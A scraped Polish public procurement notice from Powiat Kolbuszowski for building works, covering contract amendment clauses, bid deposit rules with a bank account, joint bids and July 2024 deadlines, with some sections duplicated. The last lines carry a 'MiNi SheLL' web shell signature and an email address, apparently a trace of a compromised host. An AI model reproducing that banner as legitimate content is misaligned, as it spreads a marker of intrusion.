zaistniałe okoliczności, o których mowa w ust. 7, implikowałyby zwiększenie wynagrodzenia należnego<br/>Wykonawcy łącznie o więcej niż 15 % w stosunku do wysokości wynagrodzenia umownego (wynikającego z oferty<br/>Wykonawcy), okoliczność taką poczytywać się będzie jako istotną zmianę okoliczności i w takim przypadku Zamawiający<br/>może odstąpić od umowy (w całości bądź w części) w terminie 30 od powzięcia informacji o przedmiotowym fakcie bez<br/>negatywnych dla siebie skutków prawnych.<br/>13. Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z ust. 7 zobowiązany jest do zmiany wynagrodzenia<br/>przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub<br/>kosztów dotyczących zobowiązania podwykonawcy.<br/>§23.<br/>Strony ponadto dopuszczają:<br/>1) zmiany zapisów umowy wynikające z wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy.<br/>2) zmiany adresu, lub oznaczenia Stron Umowy, przedstawicieli - wynikających ze zmiany stanu faktycznego lub prawnego, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> wadium w wysokości 10.000<br/>2. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)pieniądzu;<br/>2)gwarancjach bankowych;<br/>3)gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020 r. poz. 291).<br/>3. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>5. Wadium wnoszone w formie pieniężnej wpłaca się przelewem na rachunek bankowy Zamawiającego: Nr 09 1240 1792<br/>1111 0010 8529 4083<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt 2-4 wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Beneficjentem poręczenia lub gwarancji jest:<br/>Powiat Kolbuszowski ul.11 Listopada 10, 36-100 Kolbuszowa. Gwarancja przedkładana jako wadium w postępowaniu o<br/>zamówienie publiczne musi mieć postać gwarancji bezwarunkowej, tj. gwarancji na pierwsze żądanie. Gwarant/Poręczyciel<br/>w zapisach gwarancji/poręczenia musi zobowiązać się do nieodwołalnego i bezwarunkowego zapłacenia kwoty wadium na<br/>pierwsze pisemne żądanie zamawiającego, jeżeli wystąpią przesłanki do zatrzymania wadium, o których mowa w art. 98 ust.<br/>6 ustawy Jeżeli gwarant uzależni zapłatę sumy gwarancyjnej od dokonania czynności sprawdzających, które mają wykazać<br/>zasadność żądania beneficjenta (zamawiającego), to takie żądanie nie odpowiada wymogom co do jej bezwarunkowości.<br/>7. Wadium powinno zostać przekazane Zamawiającemu drogą komunikacji elektronicznej za pośrednictwem Platformy<br/>zakupowej przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin<br/>składania ofert). Jeżeli Wykonawca przesyła wadium poza ofertą np. mailem powinno ono być oznaczone w sposób<br/>umożliwiający jednoznaczne zidentyfikowanie, którego postepowania dotyczy (przypisanie do postępowania).<br/>7. Wadium powinno zostać przekazane Zamawiającemu drogą komunikacji<br/>6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: Tak<br/>6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>Oferta wspólna<br/>1) Wykonawcy mogą wspólnie (konsorcja, spółki cywilne) ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy<br/>w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale VII ust 1 SWZ, składa każdy z wykonawców. Oświadczenie te potwierdza brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu 3) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o zamówienie.<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (art.117 ust.4 Pzp), z<br/>którego ma wynikać, które roboty budowlane dotyczące przedmiotu zamówienia) wykonają poszczególni wykonawcy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna<br/>1) Wykonawcy mogą wspólnie (konsorcja, spółki cywilne) ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy<br/>w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale VII ust 1 SWZ, składa każdy z wykonawców. Oświadczenie te potwierdza brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu. 3) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o zamówienie.<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (art.117 ust.4 Pzp), z<br/>którego ma wynikać, które roboty budowlane dotyczące przedmiotu zamówienia) wykonają poszczególni wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> §18.<br/>Termin realizacji przedmiotu zamówienia może ulec przesunięciu w sytuacji:<br/>1) wystąpienia niekorzystnych warunków atmosferycznych.<br/>a) Jako niekorzystne warunki atmosferyczne rozumie się wystąpienie dziennej temperatury niższej niż minus 10 °C. oraz<br/>wyższej niż plus 30 stopni.<br/>Dopuszcza się jako niekorzystną inną temperaturę jeżeli uniemożliwia ona prawidłowe wykonanie robót, montażu, z powodu<br/>technologii realizacji prac/robót, wymagań sprzętowych, materiałowych określonych Umową, normami lub innymi<br/>przepisami, wymagającej konkretnych temperatur i warunków atmosferycznych.<br/>b) Jako niekorzystne warunki atmosferyczne rozumie się także opady atmosferyczne (śnieg, deszcz) trwające co najmniej 3<br/>dni w zakresie robót budowlanych zewnętrznych.<br/>c) Przez niekorzystne warunki atmosferyczne rozumie się także zjawiska pogodowe takie jak: nawałnice, ulewne deszcze,<br/>bardzo silne wiatry – uniemożliwiające prowadzenie zewnętrznych robót, podtopienia, zalegający śnieg, oblodzenia.<br/>Przesunięcie terminu nastąpi o okres adekwatny do występującego niekorzystnego zjawiska atmosferycznego, czasu jego<br/>trwania i o czas potrzebny do usunięcia skutków tego działania.<br/>2) prowadzenia równoległych robót budowlano - montażowych przez inne podmioty, które uniemożliwiają realizację<br/>zamówienia – o okres, w którym nie była możliwa realizacja zamówienia z tego powodu.<br/>3) wystąpienia siły wyższej rozumianej jako pożar, powódź, huragan, eksplozje, awarie energetyczne, wojna, operacje<br/>wojskowe, stan wojenny, stan wyjątkowy, rozruchy, niepokoje społeczne, ataki terrorystyczne, strajki, epidemie, stany<br/>pandemii, znaleziska archeologiczne, ograniczenia i zakazy wydane przez organy administracji publicznej, a także inne<br/>nadzwyczajne zjawiska losowe i przyrodnicze, wszystkie z nich pozostające poza kontrolą Stron, których nie można było<br/>przewidzieć w chwili zawarcia umowy, a jeżeli możliwe były do przewidzenia nie można było im zapobiec - o czas działania<br/>siły wyższej oraz potrzebny do usunięcia skutków tego działania,<br/>4) wystąpienia okoliczności nie leżących po stronie Wykonawcy w szczególności:<br/>a) wstrzymania robót przez Zamawiającego z przyczyn, których nie mógł przewidzieć, lub w przypadku niezbędnej<br/>konieczności np. z uwagi na bezpieczeństwo uczniów, pracowników, konieczność realizowania zadań szkoły np. matury itp.<br/>b) brak dostępu do mediów niezawiniony przez Wykonawcę (np. awarie w dostawach energii elektrycznej, wody, gazu czy<br/>innych mediów niezbędnych do wykonania przedmiotu umowy),<br/>- o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych przedmiotem umowy,<br/>5) wstrzymania przez Zamawiającego lub organy administracji publicznej np. urzędy nadzoru budowlanego (w tym<br/>orzeczeniem sądu) prac objętych Umową, w szczególności z powodu zagrożenia życia lub zdrowia na budowie, prac<br/>archeologicznych, - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót objętych przedmiotem umowy,<br/>6) konieczności wykonania dodatkowych badań i ekspertyz - o czas niezbędny do uzyskania wymaganych decyzji bądź<br/>uzgodnień lub do wykonania dodatkowych ekspertyz, badań,<br/>7) realizacji w drodze odrębnej umowy, w tym zleconej przez innego Zamawiającego, przez inny podmiot prac powiązanych<br/>z przedmiotem niniejszej umowy, wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań<br/>w tym udzielenie w trakcie realizacji umowy zamówień dodatkowych – o czas niezbędny do prawidłowego wykonania<br/>przedmiotu umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiat_kolbuszowski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-25 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> zmiany umowy cd par 18<br/>8) niedostępności lub czasowej dłuższej niedostępności na rynku materiałów, wyrobów lub urządzeń wskazanych w dokumentacji projektowej spowodowana zaprzestaniem produkcji, ograniczeniem produkcji, dużą ilością zamówień u<br/>producenta a w związku z tym długim oczekiwaniem na produkt, wycofaniem z rynku- o czas niezbędny na dokonanie zmian<br/>w dokumentacji technicznej, oraz niezbędny do wykonania przedmiotu umowy zgodnie z tymi zmianami lub o czas<br/>oczekiwania na zamówiony produkt/materiał/ towar, jeśli nie jest to spowodowane zbyt późnym zamówieniami towaru przez<br/>Wykonawcę na hurtowni/u producenta.<br/>9) wykonywania robót, prac zamiennych, które będą niezbędne do prawidłowego wykonania i zakończenia robót objętych<br/>umową podstawową. jeżeli konieczność ich wykonania może spowodować opóźnienie w realizacji przedmiotu umowy–o<br/>czas wynikający z przygotowań do ich realizacji oraz o czas ich wykonywania jeżeli wymagają one dłuższego okresu<br/>wykonywania niż w pierwotnej umowie<br/>10) wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od<br/>przyjętych w dokumentacji przetargowej oraz dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk<br/>archeologicznych, występowania niewybuchów lub niewypałów, o czas niezbędny do usunięcia przeszkody w prowadzeniu<br/>robót objętych przedmiotem umowy, w tym przeprojektowania.<br/>11) wystąpienia warunków architektonicznych tj. przebiegu kabli przewodów elektrycznych, rur, przewodów wentylacyjnych i<br/>innych w sposób istotny od przyjętych w dokumentacji przetargowej oraz dokumentacji projektowej o czas niezbędny do<br/>usunięcia przeszkody w prowadzeniu robót objętych przedmiotem umowy, w tym przeprojektowania.<br/>§19.<br/>Zamawiający dopuszcza zmianę przedstawicieli stron, podmiotów biorących udział w zamówieniu – w przypadku<br/>niemożności pełnienia przez nich powierzonych funkcji, realizacji zamówienia (np. zdarzenia losowe, zmiana pracy,<br/>rezygnacja i.t.p.) np. kierownika budowy, kierownika robót, inspektora nadzoru inwestorskiego. Zmiana jest możliwa<br/>wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą spełniać warunki określone w SWZ.<br/>§20.<br/>Zamawiający dopuszcza:<br/>1) zmianę podwykonawcy (zmiana niewymagająca sporządzania aneksu),<br/>2) rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia.<br/>Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się w celu<br/>wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest wykazać Zamawiającemu, iż<br/>proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w<br/>trakcie postępowania o udzielenie zamówienia.<br/>3) możliwość zmiany zakresu /robót/ prac jakie Wykonawca wskazał w ofercie do wykonania przy pomocy Podwykonawców<br/>(zmniejszenie, zwiększenie), jeżeli w odniesieniu do danej części nie została wyłączona dopuszczalność podwykonawstwa<br/>(nie dotyczy podmiotu, na którego zasoby Wykonawca powoływał się w celu wykazania spełniania warunków udziału w<br/>postępowaniu)<br/>Zmiany mogą nastąpić po wcześniejszej akceptacji przez Zamawiającego i spełnieniu wymagań specyfikacji dotyczących<br/>wykonywania wskazanego zakresu robót przez podwykonawców, w szczególności wykonawca na żądanie Zamawiającego<br/>przedstawia oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, lub oświadczenia lub dokumenty potwierdzające<br/>brak podstaw wykluczenia wobec nowego podwykonawcy.<br/>Zapisy dotyczące podwykonawców i zawierania z nimi umów wynikające z SWZ oraz wzoru umowy stosuje się odpowiednio.

Creat By MiNi SheLL
Email: jattceo@gmail.com